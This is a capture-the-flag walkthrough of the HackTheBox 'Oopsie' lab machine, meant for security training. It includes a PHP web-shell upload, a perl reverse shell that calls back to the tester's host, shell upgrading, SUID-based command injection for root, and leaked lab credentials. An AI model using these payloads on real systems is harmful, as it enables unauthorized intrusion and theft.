Scan results
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-03 06:15 EST
Nmap scan report for 10.10.10.28
Host is up (0.49s latency).
PORT STATE SERVICE VERSION
21/tcp closed ftp
23/tcp closed telnet
53/tcp closed domain
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
110/tcp closed pop3
111/tcp closed rpcbind
113/tcp closed ident
135/tcp closed msrpc
139/tcp closed netbios-ssn
143/tcp closed imap
256/tcp closed fw1-secureremote
445/tcp closed microsoft-ds
587/tcp closed submission
993/tcp closed imaps
995/tcp closed pop3s
1723/tcp closed pptp
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
5900/tcp closed vnc
8080/tcp closed http-proxy
8888/tcp closed sun-answerbook
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.00 seconds
Open the corresponding port 80: http://10.10.10.28/#
Nothing much to see there, so start scanning for paths.
The scan turns up a login page: http://10.10.10.28/cdn-cgi/login/i
The password is the one obtained from the earlier Windows machine!!! wdnmd
After logging in, the Account page:
http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=1
This id=1 parameter can be brute-forced; at id=30 the query returns the super admin's id and account.
The upload page, however, requires the super admin's cookie before the upload function is reachable.
The dirsearch tool finds /uploads/, which is where the uploaded PHP is saved.
Here the PHP one-liner reverse shell I used disconnected as soon as it connected; with perl the connection works normally.
test.php:
<?php echo shell_exec($_GET['shell']);?>
Visit the link:
http://10.10.10.28/uploads/test.php?shell=perl%20-MIO%20-e%20%27$p=fork;exit,if($p);$c=new%20IO::Socket::INET(PeerAddr,%2210.10.14.214:4444%22);STDIN-%3Efdopen($c,r);$~-%3Efdopen($c,w);system$_%20while%3C%3E;%27
The corresponding perl command: perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:4242");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
See swisskyrepo/PayloadsAllTheThings.
Once connected, we need to escalate privileges. First upgrade the shell to a full TTY:
SHELL=/bin/bash script -q /dev/null   // see note 1
Ctrl-Z                                // see note 2
stty raw -echo                        // see note 3
fg                                    // see note 4
reset                                 // see note 5
xterm                                 // see note 6
- Note 1: With SHELL set to /bin/bash in the environment, run script with the arguments -q and /dev/null. -q runs it quietly, and the typescript output goes to /dev/null (the black hole). Without `script -q /dev/null` no new bash is started: SHELL=/bin/bash only sets the shell variable, whereas adding script spawns a new shell for you and records everything.
- Note 2: Suspend netcat into the background.
- Note 3: Put the local terminal into raw mode so it does not interfere with the remote terminal.
- Note 4: Bring netcat back to the foreground. Note: the command you type here will not be echoed.
- Note 5: Reset the remote terminal; in testing this step can also be skipped.
- Note 6: Run xterm. Source: 渗透测试练习靶场hackthebox——Starting Point Oopsie攻略_TF0xn的博客-CSDN博客
Poking around the directories, in cdn-cgi/login I found a db.php containing an account and password; su to that user and you have user-level access.
ls -lh $(find / -perm -u=s -type f 2>/dev/null)
Lists the executables that have the SUID bit set.
cat /etc/group
Check the bugtracker group.
Finding that we can run it, execute /usr/bin/bugtracker directly.
Running it, it looks like it executes cat on the supplied input, so try `;`.
The command injection succeeds and we obtain root privileges.
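The root shell above comes from a SUID binary that hands user input to a shell. As an added example (not the box's actual bugtracker source, which the writeup does not show), here is a hypothetical SUID report viewer written in the pattern the writeup implies, beside a hardened version that validates the id and runs cat without any shell; REPORT_DIR is an assumed path.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define REPORT_DIR "/root/reports/"   /* assumed path, not from the page */

/* Injectable pattern (hypothetical reconstruction): the id is spliced into
 * a shell command line, so "1;id" makes sh run a second command with the
 * binary's effective uid. Shown only for contrast with the hardened form. */
int show_report_vulnerable(const char *id) {
    char cmd[256];
    snprintf(cmd, sizeof cmd, "cat " REPORT_DIR "%s", id);
    return system(cmd);   /* sh parses ';', '|', '$(...)' inside cmd */
}

/* Hardened check: accept only a short, non-empty run of ASCII digits. */
int is_valid_report_id(const char *id) {
    size_t n = strlen(id);
    if (n == 0 || n > 8) return 0;
    for (size_t i = 0; i < n; i++)
        if (!isdigit((unsigned char)id[i])) return 0;
    return 1;
}

/* Hardened execution: no shell involved. The path is built from a
 * validated id and handed to cat as one argv element via execv with an
 * absolute binary path, so nothing in the input can act as a command
 * separator and PATH cannot be hijacked. Returns cat's exit status,
 * or -1 for a rejected id / fork or exec failure. */
int show_report_hardened(const char *id) {
    if (!is_valid_report_id(id)) return -1;
    char path[sizeof REPORT_DIR + 8];
    snprintf(path, sizeof path, REPORT_DIR "%s", id);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "cat", path, NULL };
        execv("/bin/cat", argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Even the hardened form should not be SUID root if it can be avoided; a dedicated group on the report directory, as the bugtracker group on this box hints at, removes the need for root entirely.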
ls -lRa /root
See what is under /root.
-R, --recursive: list subdirectories recursively
Inside root’s folder, we see a .config folder, which contains a FileZilla config file with the credentials ftpuser / mc@F1l3ZilL4 visible in plain text.